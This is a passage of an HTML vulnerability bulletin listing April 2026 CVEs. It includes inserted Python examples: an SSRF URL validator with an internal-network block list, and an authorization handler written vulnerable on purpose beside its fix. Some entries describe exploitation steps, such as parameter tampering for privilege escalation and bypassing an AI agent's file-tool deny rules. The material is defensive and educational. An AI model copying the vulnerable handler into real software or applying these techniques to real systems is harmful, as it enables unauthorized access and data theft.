    </tr>

    <tr>
    <td class="vendor-product">IBM--Verify Identity Access Container</td>
    <td>IBM Verify Identity Access Container 11.0 through 11.0.2 and IBM Security Verify Access Container 10.0 through 10.0.9.1 and IBM Verify Identity Access 11.0 through 11.0.2 and IBM Security Verify Access 10.0 through 10.0.9.1 allows an attacker to contact internal authentication endpoints which are protected by the Reverse Proxy.</td>
    <td>2026-04-08</td>
    <td>7.2</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-1343" target="_blank" rel="noopener">CVE-2026-1343</a></td>
    <td><a href="https://www.ibm.com/support/pages/node/7268253" target="_blank" rel="noopener">https://www.ibm.com/support/pages/node/7268253</a><br></td>
    </tr>

    <tr>
    <td class="vendor-product">Red Hat--Red Hat Enterprise Linux 10</td>
    <td>A flaw was found in gnutls. A remote, unauthenticated attacker can exploit this vulnerability by sending a specially crafted ClientHello message with an invalid Pre-Shared Key (PSK) binder value during the TLS handshake. This can lead to a NULL pointer dereference, causing the server to crash and resulting in a remote Denial of Service (DoS) condition.</td>
    <td>2026-04-09</td>
    <td>7.5</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-1584" target="_blank" rel="noopener">CVE-2026-1584</a></td>
    <td><a href="https://access.redhat.com/security/cve/CVE-2026-1584" target="_blank" rel="noopener">https://access.redhat.com/security/cve/CVE-2026-1584</a><br><a href="https://bugzilla.redhat.com/show_bug.cgi?id=2435258" target="_blank" rel="noopener">RHBZ#2435258</a><br></td>
    </tr>

    <tr>
    <td class="vendor-product">Qualcomm, Inc.--Snapdragon</td>
    <td>Transient DOS when processing nonstandard FILS Discovery Frames with out-of-range action sizes during initial scans.</td>
    <td>2026-04-06</td>
    <td>7.6</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-21367" target="_blank" rel="noopener">CVE-2026-21367</a></td>
    <td><a href="https://docs.qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin.html" target="_blank" rel="noopener">https://docs.qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin.html</a><br></td>
    </tr>

    <tr>
    <td class="vendor-product">Qualcomm, Inc.--Snapdragon</td>
    <td>Memory Corruption when retrieving output buffer with insufficient size validation.</td>
    <td>2026-04-06</td>
    <td>7.8</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-21371" target="_blank" rel="noopener">CVE-2026-21371</a></td>
    <td><a href="https://docs.qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin.html" target="_blank" rel="noopener">https://docs.qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin.html</a><br></td>
    </tr>

    <tr>
    <td class="vendor-product">Qualcomm, Inc.--Snapdragon</td>
    <td>Memory Corruption when sending IOCTL requests with invalid buffer sizes during memcpy operations.</td>
    <td>2026-04-06</td>
    <td>7.8</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-21372" target="_blank" rel="noopener">CVE-2026-21372</a></td>
    <td><a href="https://docs.qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin.html" target="_blank" rel="noopener">https://docs.qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin.html</a><br></td>
    </tr>

    <tr>
    <td class="vendor-product">Qualcomm, Inc.--Snapdragon</td>
    <td>Memory Corruption when accessing an output buffer without validating its size during IOCTL processing.</td>
    <td>2026-04-06</td>
    <td>7.8</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-21373" target="_blank" rel="noopener">CVE-2026-21373</a></td>
    <td><a href="https://docs.qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin.html" target="_blank" rel="noopener">https://docs.qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin.html</a><br></td>
    </tr>

    <tr>
    <td class="vendor-product">Qualcomm, Inc.--Snapdragon</td>
    <td>Memory Corruption when processing auxiliary sensor input/output control commands with insufficient buffer size validation.</td>
    <td>2026-04-06</td>
    <td>7.8</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-21374" target="_blank" rel="noopener">CVE-2026-21374</a></td>
    <td><a href="https://docs.qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin.html" target="_blank" rel="noopener">https://docs.qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin.html</a><br></td>
    </tr>

    <tr>
    <td class="vendor-product">Qualcomm, Inc.--Snapdragon</td>
    <td>Memory Corruption when accessing an output buffer without validating its size during IOCTL processing.</td>
    <td>2026-04-06</td>
    <td>7.8</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-21375" target="_blank" rel="noopener">CVE-2026-21375</a></td>
    <td><a href="https://docs.qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin.html" target="_blank" rel="noopener">https://docs.qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin.html</a><br></td>
    </tr>

    <tr>
    <td class="vendor-product">Qualcomm, Inc.--Snapdragon</td>
    <td>Memory Corruption when accessing an output buffer without validating its size during IOCTL processing in a camera sensor driver.</td>
    <td>2026-04-06</td>
    <td>7.8</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-21376" target="_blank" rel="noopener">CVE-2026-21376</a></td>
    <td><a href="https://docs.qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin.html" target="_blank" rel="noopener">https://docs.qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin.html</a><br></td>
    </tr>

    <tr>
    <td class="vendor-product">Qualcomm, Inc.--Snapdragon</td>
    <td>Memory Corruption when accessing an output buffer without validating its size during IOCTL processing in a camera sensor driver.</td>
    <td>2026-04-06</td>
    <td>7.8</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-21378" target="_blank" rel="noopener">CVE-2026-21378</a></td>
    <td><a href="https://docs.qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin.html" target="_blank" rel="noopener">https://docs.qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin.html</a><br></td>
    </tr>

    <tr>
    <td class="vendor-product">Qualcomm, Inc.--Snapdragon</td>
    <td>Memory Corruption when using deprecated DMABUF IOCTL calls to manage video memory.</td>
    <td>2026-04-06</td>
    <td>7.8</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-21380" target="_blank" rel="noopener">CVE-2026-21380</a></td>
    <td><a href="https://docs.qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin.html" target="_blank" rel="noopener">https://docs.qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin.html</a><br></td>
    </tr>

    <tr>
    <td class="vendor-product">Qualcomm, Inc.--Snapdragon</td>
    <td>Transient DOS when receiving a service data frame with excessive length during device matching over a neighborhood awareness network protocol connection.</td>
    <td>2026-04-06</td>
    <td>7.6</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-21381" target="_blank" rel="noopener">CVE-2026-21381</a></td>
    <td><a href="https://docs.qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin.html" target="_blank" rel="noopener">https://docs.qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin.html</a><br></td>
    </tr>

    <tr>
    <td class="vendor-product">Qualcomm, Inc.--Snapdragon</td>
    <td>Memory Corruption when handling power management requests with improperly sized input/output buffers.</td>
    <td>2026-04-06</td>
    <td>7.8</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-21382" target="_blank" rel="noopener">CVE-2026-21382</a></td>
    <td><a href="https://docs.qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin.html" target="_blank" rel="noopener">https://docs.qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin.html</a><br></td>
    </tr>

    <tr>
    <td class="vendor-product">Juniper Networks--Junos OS</td>
    <td>A UNIX Symbolic Link (Symlink) Following vulnerability in the CLI of Juniper Networks Junos OS allows a local, authenticated attacker with low privileges to escalate their privileges to root, which will lead to a complete compromise of the system. When, after a user has performed a specific 'file link ...' CLI operation, another user commits (unrelated) configuration changes, the first user can log in as root. This issue affects Junos OS: * all versions before 23.2R2-S7, * 23.4 versions before 23.4R2-S6, * 24.2 versions before 24.2R2-S3, * 24.4 versions before 24.4R2-S2, * 25.2 versions before 25.2R2. This issue does not affect versions 25.4R1 or later.</td>
    <td>2026-04-09</td>
    <td>7.3</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-21916" target="_blank" rel="noopener">CVE-2026-21916</a></td>
    <td><a href="https://kb.juniper.net/JSA107807" target="_blank" rel="noopener">https://kb.juniper.net/JSA107807</a><br></td>
    </tr>

    <tr>
    <td class="vendor-product">Dolibarr--Dolibarr ERP/CRM</td>
    <td>Dolibarr ERP/CRM versions prior to 23.0.2 contain an authenticated remote code execution vulnerability in the dol_eval_standard() function that fails to apply forbidden string checks in whitelist mode and does not detect PHP dynamic callable syntax. Attackers with administrator privileges can inject malicious payloads through computed extrafields or other evaluation paths using PHP dynamic callable syntax to bypass validation and achieve arbitrary command execution via eval().</td>
    <td>2026-04-07</td>
    <td>7.2</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-22666" target="_blank" rel="noopener">CVE-2026-22666</a></td>
    <td><a href="https://jivasecurity.com/writeups/dolibarr-remote-code-execution-cve-2026-22666" target="_blank" rel="noopener">https://jivasecurity.com/writeups/dolibarr-remote-code-execution-cve-2026-22666</a><br><a href="https://github.com/Dolibarr/dolibarr/security/advisories/GHSA-vmvw-qq8w-wqhg" target="_blank" rel="noopener">https://github.com/Dolibarr/dolibarr/security/advisories/GHSA-vmvw-qq8w-wqhg</a><br><a href="https://github.com/Dolibarr/dolibarr/commit/6f425521b3e6f9f27eca05228e02093dbaa40dea" target="_blank" rel="noopener">https://github.com/Dolibarr/dolibarr/commit/6f425521b3e6f9f27eca05228e02093dbaa40dea</a><br><a href="https://github.com/Dolibarr/dolibarr/releases/tag/23.0.2" target="_blank" rel="noopener">https://github.com/Dolibarr/dolibarr/releases/tag/23.0.2</a><br><a href="https://www.vulncheck.com/advisories/dolibarr-erp-crm-authenticated-rce-via-dol-eval-standard" target="_blank" rel="noopener">https://www.vulncheck.com/advisories/dolibarr-erp-crm-authenticated-rce-via-dol-eval-standard</a><br></td>
    </tr>

    <tr>
    <td class="vendor-product">HKUDS--OpenHarness</td>
    <td>OpenHarness prior to commit 166fcfe contains an improper access control vulnerability in built-in file tools due to inconsistent parameter handling in permission enforcement, allowing attackers who can influence agent tool execution to read arbitrary local files outside the intended repository scope. Attackers can exploit the path parameter not being passed to the PermissionChecker in read_file, write_file, edit_file, and notebook_edit tools to bypass deny rules and access sensitive files such as configuration files, credentials, and SSH material, or create and overwrite files in restricted host paths in full_auto mode.</td>
    <td>2026-04-07</td>
    <td>7.1</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-22682" target="_blank" rel="noopener">CVE-2026-22682</a></td>
    <td><a href="https://github.com/HKUDS/OpenHarness/pull/32" target="_blank" rel="noopener">https://github.com/HKUDS/OpenHarness/pull/32</a><br><a href="https://github.com/HKUDS/OpenHarness/commit/166fcfefb7614dbac51bd061f56542725b0298e9" target="_blank" rel="noopener">https://github.com/HKUDS/OpenHarness/commit/166fcfefb7614dbac51bd061f56542725b0298e9</a><br><a href="https://www.vulncheck.com/advisories/openharness-improper-access-control-via-file-tools" target="_blank" rel="noopener">https://www.vulncheck.com/advisories/openharness-improper-access-control-via-file-tools</a><br></td>
    </tr>

    <tr>
    <td class="vendor-product">VMware--Spring Cloud Gateway</td>
    <td>When configuring SSL bundles in Spring Cloud Gateway by using the configuration property spring.ssl.bundle, the configuration was silently ignored and the default SSL configuration was used instead. Note: The 4.2.x branch is no longer under open source support. If you are using Spring Cloud Gateway 4.2.0 and are not an enterprise customer, you can upgrade to any Spring Cloud Gateway 4.2.x release newer than 4.2.0 available on Maven Central (https://repo1.maven.org/maven2/org/springframework/cloud/spring-cloud-gateway/). Ideally, if you are not an enterprise customer, you should upgrade to 5.0.2 or 5.1.1, which are the current supported open source releases.</td>
    <td>2026-04-10</td>
    <td>7.5</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-22750" target="_blank" rel="noopener">CVE-2026-22750</a></td>
    <td><a href="https://spring.io/security/cve-2026-22750" target="_blank" rel="noopener">https://spring.io/security/cve-2026-22750</a><br></td>
    </tr>

    <tr>
    <td class="vendor-product">Dell--Elastic Cloud Storage</td>
    <td>Dell Elastic Cloud Storage, version 3.8.1.7 and prior, and Dell ObjectScale, versions prior to 4.1.0.3 and version 4.2.0.0, contain an Insertion of Sensitive Information into Log File vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to secret exposure. The attacker may be able to use the exposed secret to access the vulnerable system with privileges of the compromised account.</td>
    <td>2026-04-08</td>
    <td>7.8</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-28261" target="_blank" rel="noopener">CVE-2026-28261</a></td>
    <td><a href="https://www.dell.com/support/kbdoc/en-us/000449325/dsa-2026-143-security-update-for-dell-objectscale-prior-to-4-1-0-3-and-4-2-0-0-insertion-of-sensitive-information-into-log-file-vulnerability" target="_blank" rel="noopener">https://www.dell.com/support/kbdoc/en-us/000449325/dsa-2026-143-security-update-for-dell-objectscale-prior-to-4-1-0-3-and-4-2-0-0-insertion-of-sensitive-information-into-log-file-vulnerability</a><br></td>
    </tr>

    <tr>
    <td class="vendor-product">CouchCMS--CouchCMS</td>
    <td>CouchCMS contains a privilege escalation vulnerability that allows authenticated Admin-level users to create SuperAdmin accounts by tampering with the f_k_levels_list parameter in user creation requests. Attackers can modify the parameter value from 4 to 10 in the HTTP request body to bypass authorization validation and gain full application control, circumventing restrictions on SuperAdmin account creation and privilege assignment.</td>
    <td>2026-04-10</td>
    <td>7.2</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-29002" target="_blank" rel="noopener">CVE-2026-29002</a></td>
    <td><a href="https://gist.github.com/thepiyushkumarshukla/477e2d2bbbe8cc3ec0d640c50f0cf9e1" target="_blank" rel="noopener">https://gist.github.com/thepiyushkumarshukla/477e2d2bbbe8cc3ec0d640c50f0cf9e1</a><br><a href="https://www.couchcms.com/" target="_blank" rel="noopener">https://www.couchcms.com/</a><br><a href="https://www.vulncheck.com/advisories/couchcms-privilege-escalation-via-f-k-levels-list-parameter" target="_blank" rel="noopener">https://www.vulncheck.com/advisories/couchcms-privilege-escalation-via-f-k-levels-list-parameter</a><br></td>
    </tr>

    <tr>
    <td class="vendor-product">glpi-project--glpi</td>
    <td>GLPI is a free asset and IT management software package. From 10.0.0 to before 10.0.24 and 11.0.6, an authenticated user can perform a SQL injection via the logs export feature. This vulnerability is fixed in 10.0.24 and 11.0.6.</td>
    <td>2026-04-06</td>
    <td>7.2</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-29047" target="_blank" rel="noopener">CVE-2026-29047</a></td>
    <td><a href="https://github.com/glpi-project/glpi/security/advisories/GHSA-3m49-qf92-vccr" target="_blank" rel="noopener">https://github.com/glpi-project/glpi/security/advisories/GHSA-3m49-qf92-vccr</a><br></td>
    </tr>

    <tr>
    <td class="vendor-product">open-telemetry--opentelemetry-go</td>
    <td>OpenTelemetry-Go is the Go implementation of OpenTelemetry. From 1.36.0 to 1.40.0, multi-value baggage: header extraction parses each header field-value independently and aggregates members across values. This allows an attacker to amplify CPU and allocations by sending many baggage: header lines, even when each individual value is within the 8192-byte per-value parse limit. This vulnerability is fixed in 1.41.0.</td>
    <td>2026-04-07</td>
    <td>7.5</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-29181" target="_blank" rel="noopener">CVE-2026-29181</a></td>
    <td><a href="https://github.com/open-telemetry/opentelemetry-go/security/advisories/GHSA-mh2q-q3fh-2475" target="_blank" rel="noopener">https://github.com/open-telemetry/opentelemetry-go/security/advisories/GHSA-mh2q-q3fh-2475</a><br></td>
    </tr>

    <tr>
    <td class="vendor-product">Tinyproxy Project--Tinyproxy</td>
    <td>Tinyproxy through 1.11.3 is vulnerable to HTTP request parsing desynchronization due to a case-sensitive comparison of the Transfer-Encoding header in src/reqs.c. The is_chunked_transfer() function uses strcmp() to compare the header value against "chunked", even though RFC 7230 specifies that transfer-coding names are case-insensitive. By sending a request with Transfer-Encoding: Chunked, an unauthenticated remote attacker can cause Tinyproxy to misinterpret the request as having no body. In this state, Tinyproxy sets content_length.client to -1, skips pull_client_data_chunked(), forwards request headers upstream, and transitions into relay_connection() raw TCP forwarding while unread body data remains buffered. This leads to inconsistent request state between Tinyproxy and backend servers. RFC-compliant backends (e.g., Node.js, Nginx) will continue waiting for chunked body data, causing connections to hang indefinitely. This behavior enables application-level denial of service through backend worker exhaustion. Additionally, in deployments where Tinyproxy is used for request-body inspection, filtering, or security enforcement, the unread body may be forwarded without proper inspection, resulting in potential security control bypass.</td>
    <td>2026-04-07</td>
    <td>7.5</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-31842" target="_blank" rel="noopener">CVE-2026-31842</a></td>
    <td><a href="https://github.com/tinyproxy/tinyproxy/issues/604" target="_blank" rel="noopener">Upstream issue report and reproduction details</a><br><a href="https://github.com/tinyproxy/tinyproxy" target="_blank" rel="noopener">Tinyproxy upstream project</a><br><a href="https://datatracker.ietf.org/doc/html/rfc7230" target="_blank" rel="noopener">RFC 7230: transfer-coding names are case-insensitive</a><br></td>
    </tr>

    <tr>
    <td class="vendor-product">chamilo--chamilo-lms</td>
    <td>Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, in main/lp/aicc_hacp.php, user-controlled request parameters are directly used to set the PHP session ID before loading global bootstrap. This leads to session fixation. This vulnerability is fixed in 1.11.38 and 2.0.0-RC.3.</td>
    <td>2026-04-10</td>
    <td>7.5</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-31940" target="_blank" rel="noopener">CVE-2026-31940</a></td>
    <td><a href="https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-4gp7-cfjh-77gv" target="_blank" rel="noopener">https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-4gp7-cfjh-77gv</a><br><a href="https://github.com/chamilo/chamilo-lms/commit/ce0192c62e48c9d9474d915c541b3274844afbf9" target="_blank" rel="noopener">https://github.com/chamilo/chamilo-lms/commit/ce0192c62e48c9d9474d915c541b3274844afbf9</a><br><a href="https://github.com/chamilo/chamilo-lms/commit/e337b7cc74a0276a0b4f91f9282204d20cac1869" target="_blank" rel="noopener">https://github.com/chamilo/chamilo-lms/commit/e337b7cc74a0276a0b4f91f9282204d20cac1869</a><br></td>
    </tr>

    <td class="vendor-product">chamilo--chamilo-lms</td>
    <td>Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, Chamilo LMS contains a Server-Side Request Forgery (SSRF) vulnerability in the Social Wall feature. The endpoint read_url_with_open_graph accepts a URL from the user via the social_wall_new_msg_main POST parameter and performs two server-side HTTP requests to that URL without validating whether the target is an internal or external resource. This allows an authenticated attacker to force the server to make arbitrary HTTP requests to internal services, scan internal ports, and access cloud instance metadata. This vulnerability is fixed in 1.11.38 and 2.0.0-RC.3.</td>
    <td>2026-04-10</td>
    <td>7.7</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-31941" target="_blank" rel="noopener">CVE-2026-31941</a></td>

    <td><a href="https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-q74c-mx8x-489h" target="_blank" rel="noopener">https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-q74c-mx8x-489h</a><br><a href="https://github.com/chamilo/chamilo-lms/commit/e3790c5f0ff3b4dc547c2099fadf5c438c1bb265" target="_blank" rel="noopener">https://github.com/chamilo/chamilo-lms/commit/e3790c5f0ff3b4dc547c2099fadf5c438c1bb265</a><br><a href="https://github.com/chamilo/chamilo-lms/commit/ea6b7b7e90580c9b01dc4bcafe4ad737061e0ead" target="_blank" rel="noopener">https://github.com/chamilo/chamilo-lms/commit/ea6b7b7e90580c9b01dc4bcafe4ad737061e0ead</a></td>

    </tr>
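The validation the CVE-2026-31941 entry says was missing, as an added example (not Chamilo's code and not its fix): an outbound-URL check for a fetch-by-URL feature such as an Open Graph reader. It rejects non-HTTP schemes and embedded credentials, resolves the host, and refuses any name whose answers include loopback, RFC 1918, link-local (including the 169.254.169.254 metadata address) or other internal ranges. The resolver is injectable so the check runs offline here; the DNS fixture and hostnames are constructed.

```python
"""Added example, not Chamilo code: outbound-URL validation that a
fetch-by-URL feature needs before making a server-side request."""
import ipaddress
import socket
from typing import Callable, List
from urllib.parse import urlsplit

# Address ranges a server-side fetcher should never reach on a user's behalf.
BLOCKED_NETWORKS = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "127.0.0.0/8",
    "169.254.0.0/16",          # link-local; 169.254.169.254 is cloud metadata
    "172.16.0.0/12", "192.168.0.0/16", "100.64.0.0/10",
    "::1/128", "fc00::/7", "fe80::/10", "::ffff:0:0/96",
)]


def resolve_all(host: str) -> List[str]:
    """Default resolver: every A/AAAA answer, since any one may be used."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def is_blocked(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in BLOCKED_NETWORKS)


def validate_outbound_url(url: str,
                          resolver: Callable[[str], List[str]] = resolve_all) -> List[str]:
    """Return the vetted IP list for url, or raise ValueError.

    Callers must connect to one of the returned IPs (pinning the Host
    header) rather than re-resolving, and must re-run this check on every
    redirect hop; otherwise DNS rebinding or a 302 to 169.254.169.254
    walks straight past it."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        raise ValueError(f"scheme not allowed: {parts.scheme!r}")
    if not parts.hostname or parts.username or parts.password:
        raise ValueError("missing host or embedded credentials")
    try:                                   # literal IPv4/IPv6 host: no lookup needed
        ips = [str(ipaddress.ip_address(parts.hostname))]
    except ValueError:
        ips = resolver(parts.hostname)
    if not ips:
        raise ValueError("host does not resolve")
    bad = [ip for ip in ips if is_blocked(ip)]
    if bad:
        raise ValueError(f"{parts.hostname} resolves to blocked address(es): {bad}")
    return ips


# Constructed DNS fixture: a public site, a name pointing at metadata, and a
# name that answers with both a public and a private address.
FAKE_DNS = {
    "example.com": ["93.184.216.34"],
    "metadata.attacker.test": ["169.254.169.254"],
    "rebind.attacker.test": ["93.184.216.34", "10.0.0.5"],
}


def fake_resolver(host: str) -> List[str]:
    return FAKE_DNS.get(host, [])


def rejected(fn, *args) -> bool:
    """True if fn(*args) raises ValueError; used to exercise the negatives."""
    try:
        fn(*args)
        return False
    except ValueError:
        return True
```

The IP-based check is necessary but not sufficient: a feature that makes two requests to the URL (as the entry describes) must validate both, and any HTTP client that follows redirects automatically must be configured not to, or to re-validate each Location before following it.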

    <td class="vendor-product">chartbrew--chartbrew</td>
    <td>Chartbrew is an open-source web application that can connect directly to databases and APIs and use the data to create charts. Prior to 4.9.0, a cross-tenant authorization bypass exists in Chartbrew in GET /team/:team_id/template/generate/:project_id. The GET handler calls checkAccess(req, "updateAny", "chart") without awaiting the returned promise, and it does not verify that the supplied project_id belongs to req.params.team_id or to the caller's team. As a result, an authenticated attacker with valid template-generation permissions in their own team can request the template model for a project belonging to another team and receive victim project data. This vulnerability is fixed in 4.9.0.</td>
    <td>2026-04-10</td>
    <td>7.7</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-32252" target="_blank" rel="noopener">CVE-2026-32252</a></td>

    <td><a href="https://github.com/chartbrew/chartbrew/security/advisories/GHSA-mw4f-cf22-qpcj" target="_blank" rel="noopener">https://github.com/chartbrew/chartbrew/security/advisories/GHSA-mw4f-cf22-qpcj</a><br><a href="https://github.com/chartbrew/chartbrew/commit/bf5919043d3587fcbe76123aaabd9a0a9d1033f1" target="_blank" rel="noopener">https://github.com/chartbrew/chartbrew/commit/bf5919043d3587fcbe76123aaabd9a0a9d1033f1</a></td>

    </tr>
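The two defects in the CVE-2026-32252 entry, as an added example (not Chartbrew's code, which is JavaScript): a Python analogue in which the permission check is an async function and the handler forgets to await it. A coroutine object, like an un-awaited Promise, is truthy, so the denial branch can never run; the second bug is that the project looked up from the URL is never tied to the team in the URL or to the caller's membership. The fixture data, request shape and `check_access` helper are constructed for the example.

```python
"""Added example, not Chartbrew code: a Python analogue of an un-awaited
authorization check plus a missing tenant-scope check, beside the fixed
handler.  Fixtures are constructed."""
import asyncio
from typing import Dict

# Constructed fixture: two tenants, one project each.
PROJECTS: Dict[int, Dict[str, object]] = {
    1: {"team_id": 10, "name": "acme-dashboard"},
    2: {"team_id": 20, "name": "victim-dashboard"},
}


async def check_access(req: Dict[str, object], action: str, resource: str) -> bool:
    """Stand-in for an async permission lookup (hypothetical)."""
    await asyncio.sleep(0)
    return action in req["permissions"]


async def vulnerable_generate(req: Dict[str, object]) -> Dict[str, object]:
    # Bug 1: the coroutine is never awaited.  A coroutine object (like a
    # Promise) is truthy, so `not check_access(...)` is always False and the
    # denial branch is dead code.  Python only hints at this with a
    # "coroutine ... was never awaited" RuntimeWarning at garbage collection.
    if not check_access(req, "updateAny", "chart"):
        raise PermissionError("forbidden")
    # Bug 2: project_id comes from the URL and is never tied to team_id.
    return PROJECTS[req["project_id"]]


async def fixed_generate(req: Dict[str, object]) -> Dict[str, object]:
    if not await check_access(req, "updateAny", "chart"):
        raise PermissionError("forbidden")
    project = PROJECTS.get(req["project_id"])
    # Tenant scoping: the project must belong to the team named in the URL,
    # and the caller must actually be a member of that team.
    if (project is None
            or project["team_id"] != req["team_id"]
            or req["team_id"] not in req["member_of"]):
        raise PermissionError("project not in caller's team")
    return project


def request_from_team_10(project_id: int) -> Dict[str, object]:
    """Caller in team 10 with template-generation permission, asking for
    an arbitrary project through their own team's URL."""
    return {"team_id": 10, "member_of": {10}, "permissions": {"updateAny"},
            "project_id": project_id}


def run(handler, project_id: int = 2) -> str:
    """Drive a handler and return the project name or the denial reason."""
    try:
        return asyncio.run(handler(request_from_team_10(project_id)))["name"]
    except PermissionError as exc:
        return f"denied: {exc}"
```

The lesson generalises beyond this endpoint: any authorization helper that returns a promise or coroutine must be awaited before its result is tested, and a linter rule for floating promises (or Python's "never awaited" warning treated as an error in tests) catches the whole class.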

    <td class="vendor-product">Red Hat--mirror registry for Red Hat OpenShift</td>
    <td>A flaw was found in Red Hat Quay's container image upload process. An authenticated user with push access to any repository on the registry can interfere with image uploads in progress by other users, including those in repositories they do not have access to. This could allow the attacker to read, modify, or cancel another user's in-progress image upload.</td>
    <td>2026-04-08</td>
    <td>7.1</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-32589" target="_blank" rel="noopener">CVE-2026-32589</a></td>

    <td><a href="https://access.redhat.com/security/cve/CVE-2026-32589" target="_blank" rel="noopener">https://access.redhat.com/security/cve/CVE-2026-32589</a><br><a href="https://bugzilla.redhat.com/show_bug.cgi?id=2446963" target="_blank" rel="noopener">RHBZ#2446963</a></td>
    </tr>

    <td class="vendor-product">Red Hat--mirror registry for Red Hat OpenShift</td>
    <td>A flaw was found in Red Hat Quay's handling of resumable container image layer uploads. The upload process stores intermediate data in the database using a format that, if tampered with, could allow an attacker to execute arbitrary code on the Quay server.</td>
    <td>2026-04-08</td>
    <td>7.1</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-32590" target="_blank" rel="noopener">CVE-2026-32590</a></td>

    <td><a href="https://access.redhat.com/security/cve/CVE-2026-32590" target="_blank" rel="noopener">https://access.redhat.com/security/cve/CVE-2026-32590</a><br><a href="https://bugzilla.redhat.com/show_bug.cgi?id=2446964" target="_blank" rel="noopener">RHBZ#2446964</a></td>
    </tr>

    <td class="vendor-product">NI--LabVIEW</td>
    <td>There is a memory corruption vulnerability due to an out-of-bounds write when loading a corrupted LVLIB file in NI LabVIEW. This vulnerability may result in information disclosure or arbitrary code execution. Successful exploitation requires an attacker to get a user to open a specially crafted .lvlib file. This vulnerability affects NI LabVIEW 2026 Q1 (26.1.0) and prior versions.</td>
    <td>2026-04-07</td>
    <td>7.8</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-32860" target="_blank" rel="noopener">CVE-2026-32860</a></td>

    <td><a href="https://www.ni.com/en/support/security/available-critical-and-security-updates-for-ni-software/2026/lv-project-library-file-parsing-memory-corruption-vulnerability-in-ni-labview.html" target="_blank" rel="noopener">https://www.ni.com/en/support/security/available-critical-and-security-updates-for-ni-software/2026/lv-project-library-file-parsing-memory-corruption-vulnerability-in-ni-labview.html</a></td>
    </tr>

    <td class="vendor-product">NI--LabVIEW</td>
    <td>There is a memory corruption vulnerability due to an out-of-bounds write when loading a corrupted LVCLASS file in NI LabVIEW. This vulnerability may result in information disclosure or arbitrary code execution. Successful exploitation requires an attacker to get a user to open a specially crafted .lvclass file. This vulnerability affects NI LabVIEW 2026 Q1 (26.1.0) and prior versions.</td>
    <td>2026-04-07</td>
    <td>7.8</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-32861" target="_blank" rel="noopener">CVE-2026-32861</a></td>

    <td><a href="https://www.ni.com/en/support/security/available-critical-and-security-updates-for-ni-software/2026/lv-class-file-parsing-memory-corruption-vulnerability-in-ni-labview.html" target="_blank" rel="noopener">https://www.ni.com/en/support/security/available-critical-and-security-updates-for-ni-software/2026/lv-class-file-parsing-memory-corruption-vulnerability-in-ni-labview.html</a></td>
    </tr>

    <td class="vendor-product">NI--LabVIEW</td>
    <td>There is a memory corruption vulnerability due to an out-of-bounds write in ResFileFactory::InitResourceMgr() in NI LabVIEW. This vulnerability may result in information disclosure or arbitrary code execution. Successful exploitation requires an attacker to get a user to open a specially crafted VI file. This vulnerability affects NI LabVIEW 2026 Q1 (26.1.0) and prior versions.</td>
    <td>2026-04-07</td>
    <td>7.8</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-32862" target="_blank" rel="noopener">CVE-2026-32862</a></td>

